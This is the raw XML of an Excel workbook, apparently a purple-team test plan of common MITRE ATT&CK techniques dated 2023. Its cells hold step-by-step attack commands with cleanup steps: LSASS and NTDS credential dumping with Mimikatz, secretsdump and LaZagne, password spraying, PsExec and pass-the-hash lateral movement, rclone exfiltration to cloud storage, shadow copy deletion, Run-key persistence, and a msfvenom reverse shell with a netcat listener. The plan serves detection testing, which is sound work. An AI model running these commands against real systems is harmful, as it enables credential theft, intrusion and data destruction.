1.1 ```rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id C:\Users\purple\lsass-comsvcs.dmp full```
2. Download Mimikatz here: https://github.com/gentilkiwi/mimikatz/releases/latest and run the following in an elevated command prompt:
```
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
```
3. Download "Invoke-Mimikatz" as m.ps1 and run the following in an elevated Powershell prompt:
```
Import-Module C:\Users\purple\m.ps1; Invoke-Mimikatz -ComputerName &lt;COMPUTER_NAME&gt;
```
4. Download LaZagne here: https://github.com/AlessandroZ/LaZagne/releases/latest and run the following in an elevated command prompt:
```
lazagne.exe all -oN -output C:\Users\purple
```
5. Execute the same procedure as 4 but with a renamed binary 
```
ls.exe all -oN -output C:\Users\purple
```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Permanently delete all created dump files</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Dump NTDS with ntdsutil by running the following in a command prompt on DC:
1.1 ```ntdsutil "ac i ntds" "ifm" "create full dump_folder" q q```
2. Dump NTDS using secretsdump.py downloaded at: https://github.com/fortra/impacket/blob/master/examples/secretsdump.py
2.1 Normal execution using replication service
```python3 secretsdump.py -just-dc domain/user@DChostname```
2.2 Execution using VSS
```python3 secretsdump.py -just-dc domain/user@DC hostname -use-vss```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Clean up created dump file(s)</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Download password spray script at https://github.com/dafthack/DomainPasswordSpray and run the following:
```Import-Module .\domainpasswordspary.ps1; Invoke-DomainPasswordSpray -UserList .\users.txt -domain domain.local -PasswordList passwords.txt -OutFile creds.txt```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download adfind here: https://www.joeware.net/freetools/tools/adfind/ and execute the following commands:
```
adfind.exe
renamed_adfind.exe
adfind -f (objectcategory=person) &gt; ad_users.txt
adfind -f objectcategory=computer &gt; ad_computers.txt
```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Deleting all output files</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Run the following discovery commands:
```
ipconfig /all
net view /all
systeminfo
ping -n 1 &lt;IP&gt;
nltest /dclist:
nltest /domain_trusts
nltest /domain_trust /all_trusts
net group "Domain Administrators" /domain
route print
nslookup -querytype=ALL -timeout=10
cmd /c set
netstat -nao
net localgroup
```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Use mstsc.exe to login into a remote computer of your choice
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download psexec from official source:  https://learn.microsoft.com/en-us/sysinternals/downloads/psexec and run the following command:
```psexec.exe  \\&lt;IP ADDRESS&gt; -u &lt;DOMAIN&gt;\Administrator -p "&lt;PASSWORD&gt;" -s -d -h -r mstdc -accepteula -nobanner C:\windows\system32\calc.exe```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Kill process on remote machine</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Usage of certutil and 7z using the following command lines:
1. ```certutil -encode inputFile outputFile```
2. ```C:\Windows\system32\cmd.exe /C 7za.exe a -tzip -mx5 c:\programdata\lsass.zip c:\programdata\lsass.dmp```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete created files</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Those tools usually have a free version but it requires to sign up with an account. Sign up, download from the official website and sign-in to be able to remotely access.
1. AnyDesk
2. Splashtop Remote/Streamer
3. Atera RMM
4. TeamViewer
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Uninstall/delete application</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download flightsim from: https://github.com/alphasoc/flightsim/releases
2. Follow installation procedure depending on package downloaded.
3. Run the following commands to simulate C2 traffic:
```
flightsim run c2:trickbot
flightsim run c2:bumblebee
flightsim run "c2:raccoon stealer"
flightsim run "c2:redline stealer"
flightsim run "c2:respberry robin"
flightsim run "c2:raccoon stealer"
flightsim run "c2:remcos rat"
```
Alternatively, run the following command to retrieve the list of all c2 families available for you to test:
```flightsim get c2:families```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Download rclone from: https://rclone.org/downloads/ and run the following command:
```rclone.exe copy ''\\&lt;server&gt;\&lt;path&gt;" mega:folder -q --ignore-existing --auto-confirm --multi-thread-streams 6 --transfers 6```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. ```vssadmin delete shadows /all /quiet```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. ```wmic shadowcopy delete```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Download athe following project: https://github.com/bmdyy/proc-hollow
It requires, a WIndows machine with Visual Studio and second machine (preferrably a Kali Linux).
1. Open the project in Visual Studio and modify the "CreateProcess" call with the process of your choice
2. Use the following msfvenom command to generate a C# shellcode: ```msfvenom -p windows/x64/shell_reverse_tcp LPORT=4443 LHOST=&lt;KALI_IP&gt; -f csharp -v shellcode```
3. Build
4. Create a listener on Kali Linux with the following command: ```nc -nlvp 4443```
3. Run the executable on the target Windows machine
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. Kill the running created process
2. Stop the netcat listener on Kali Linux
2. Delete the executable created</t>
    </r>
  </si>
  <si>
    <t>Mostly an offensive computer such as CommandoVM or Kali Linux. 
A minimum of 2 machines, if possible, domain-joined with administrative access.
Some tests might failed because of your AV, EDR, Local Firewall and other controls and that is great! But you should also run those tests with those controls disabled to identify if at least on systems where those controls would fail, you would have telemetry about thos behaviors.</t>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
1. ```reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PurpleCalc" /t REG_SZ /d "C:\Windows\System32\calc.exe" /f```
2. ```reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "PurpleCalc" /t REG_SZ /d "C:\Windows\System32\calc.exe" /f```
3. ```reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "PurpleCalc" /t REG_SZ /d "C:\Windows\System32\calc.exe" /f```
4. ```reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "PurpleCalc" /t REG_SZ /d "C:\Windows\System32\calc.exe" /f```
5. ```reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v "PurpleCalc" /t REG_EXPAND_SZ /d "C:\Windows\System32\calc.exe" /f```
6. ```reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Run" /v "PurpleCalc" /t REG_SZ /d "C:\Windows\System32\calc.exe" /f```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
1. Delete all created registry keys</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Attack procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <charset val="1"/>
      </rPr>
      <t xml:space="preserve">
Metasploit - PSexec module
1. Get a meterpreter session
2. Run the following commands
```
use exploit/windows/smb/psexec
set RHOSTS &lt;TARGET_IP&gt;
set SMBDomain &lt;TARGET_DOMAIN&gt;
set SMBUser &lt;TARGET_USER&gt;
set SMBPass &lt;LMHASH&gt;:&lt;NTHASH&gt;
set SMBSHARE ADMIN$
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST &lt;ATTACKING_IP&gt;
set LPORT &lt;LISTENING_PORT&gt;
exploit
```
PSExec
1. Using the NTLM hash from previous Mimikatz test
2. Run the following mimikatz command 
```sekurlsa::pth /user:&lt;USER&gt; /domain:&lt;DOMAIN&gt; /ntlm:&lt;NTHASH&gt;```
3. In the new cmd windows opened, run the following psexec command: ```psexec \\&lt;IP&gt; cmd.exe```
</t>
    </r>
    <r>
      <rPr>
        <u/>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Cleaning procedure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">
n/a</t>
    </r>
  </si>
  <si>
    <t>11.11.2023</t>
  </si>
  <si>
    <t>Author</t>
  </si>
  <si>
    <t>@sam0x90</t>
  </si>
  <si>
    <t>TOP MITRE ATT&amp;CK techniques and tools from 2022-2023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</si>
</sst>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u/>
      <sz val="11"/>
      <color rgb="FF0563C1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="16"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="26"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="8">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="1" tint="0.34998626667073579"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFAC0000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF4747"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF7030A0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0070C0"/>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0" fontId="1" fillId="0" borderId="0" applyBorder="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" applyNumberForma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vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="5" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="2" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="4" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="7" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" quotePrefix="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="8" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="7" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="9" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="7" xfId="0" applyFont="1"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horizontal="left"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left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="6" borderId="9" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="4" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="7" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"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0" xfId="0" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>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6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="4" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="7" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="3">
    <cellStyle name="Hyperlink" xfId="2" xr:uid="{00000000-000B-0000-0000-000008000000}"/>
